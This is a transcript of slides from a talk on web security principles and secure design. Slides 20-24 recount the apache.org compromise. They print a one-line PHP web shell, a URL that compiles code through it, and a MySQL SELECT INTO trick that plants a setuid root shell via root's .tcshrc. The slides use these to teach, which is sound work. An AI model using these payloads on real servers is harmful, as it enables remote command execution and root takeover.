Security and Web Programming/Design
-
Upload
santiago-martin -
Category
Documents
-
view
25 -
download
0
description
Transcript of Security and Web Programming/Design
![Page 1: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/1.jpg)
Security and Web Programming/Design
![Page 2: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/2.jpg)
cell phones
bio-facilities
Sodas, junk food, and coffee
Welcome to the No Smoking State
![Page 3: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/3.jpg)
who are you?
where are you from?
what do you do?
Emacs or vi?
![Page 4: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/4.jpg)
Warm Fuzzies
Secure Design and Implementation
Wordage
![Page 5: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/5.jpg)
Security Concepts
Vetting Software
Design Strategy
Developer practices
Coding Practices
Operational Practices
![Page 6: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/6.jpg)
Security Concepts
![Page 7: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/7.jpg)
trust
transitive trust
![Page 8: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/8.jpg)
principle of least privilege
enumerating badness
“best block: not be there”
-- Mr. Miyage
![Page 9: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/9.jpg)
“defense in depth”
![Page 10: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/10.jpg)
threats
vulnerabilities
risks
![Page 11: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/11.jpg)
who accepts the risk?
![Page 12: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/12.jpg)
being paranoid
![Page 13: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/13.jpg)
confidentiality
integrity
availability
![Page 14: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/14.jpg)
protect what you can
detect what you can’t prevent
![Page 15: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/15.jpg)
hammers, nails...
![Page 16: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/16.jpg)
a security mechanism is design to protect against a specific
finite set of attacks.
It usually fails gloriously when modified or used for
other purposes.
![Page 17: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/17.jpg)
don’t design your own new security protocol
![Page 18: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/18.jpg)
the law of unintended consequences
![Page 19: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/19.jpg)
don’t rely on the environment for protection
don’t rely on good behavior
don’t rely on things you can’t control
![Page 20: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/20.jpg)
how apache.org got pwn3d
![Page 21: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/21.jpg)
ftproot == wwwroot
webuser == o+w
![Page 22: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/22.jpg)
upload php via ftp
<? passthru($cmd); ?>
upload backdoor code
compile and execute via http
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c
voila! shell on web server
![Page 23: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/23.jpg)
bugzilla talking to mysql
mysql running as root
mysql username/password stored script
![Page 24: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/24.jpg)
create table with text field
insert:
#!/bin/shcp /bin/sh /tmp/.rootshchmod 4755 /tmp/.rootshrm -f /root/.tcshrc
query: SELECT ... INTO ‘/root/.tchsrc’
wait for someone to “su -”
![Page 25: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/25.jpg)
Security Vetting
![Page 26: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/26.jpg)
What is it supposed to do?
How does it work?
What side effects are there?
How is it deployed and maintained?
![Page 27: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/27.jpg)
How does it fail?
What is the risk?
Can it be mitigated?
![Page 28: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/28.jpg)
usability and security
![Page 29: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/29.jpg)
understanding
caring
under-budget
![Page 30: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/30.jpg)
security is an enabling task
![Page 31: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/31.jpg)
It is especially important for expert programmers to internalize this habit, for two reasons. One is that expert programmers are disproportionately drawn from the high end of the bell curve in their working-set size; therefore they tend to systematically overestimate the amount of complexity other people can handle easily.
-- Eric S. Raymond, The Art of Unix Usability
![Page 32: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/32.jpg)
Design Strategy
![Page 33: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/33.jpg)
top down design
![Page 34: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/34.jpg)
goals
requirements
design
review
![Page 35: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/35.jpg)
what is the end result?
what problem trying to solve?
*not* how it is implemented
![Page 36: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/36.jpg)
security
usability
performance
environmental
![Page 37: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/37.jpg)
support
deployment
political
external
![Page 38: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/38.jpg)
as simple as possible to meet the requirements
add requirements if apparent during design
be prepared to change when requirements can’t be met
![Page 39: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/39.jpg)
for each security control
what threat is addressed?
Really?
![Page 40: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/40.jpg)
recent examples
![Page 41: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/41.jpg)
Developer Practices
![Page 42: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/42.jpg)
The three virtues of a programmer are laziness, impatience, and hubris.
-- Larry Wall
![Page 43: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/43.jpg)
Group permissions and accounts
Code Safety
Test Environment
Regression Testing
![Page 44: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/44.jpg)
Coding Practices
![Page 45: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/45.jpg)
bounds checking
input validation
no client-side trust
error checking
![Page 46: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/46.jpg)
sql injection
cross-site scripting
credential handling
data mapping
logging
![Page 47: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/47.jpg)
don’t require shell for remote execution
![Page 48: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/48.jpg)
![Page 49: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/49.jpg)
Operational Practices
![Page 50: Security and Web Programming/Design](https://reader035.fdocuments.net/reader035/viewer/2022062408/5681311d550346895d978706/html5/thumbnails/50.jpg)
Server accounts and permissions
handling credentials
accountability
software maintenance
documentation
testing and debugging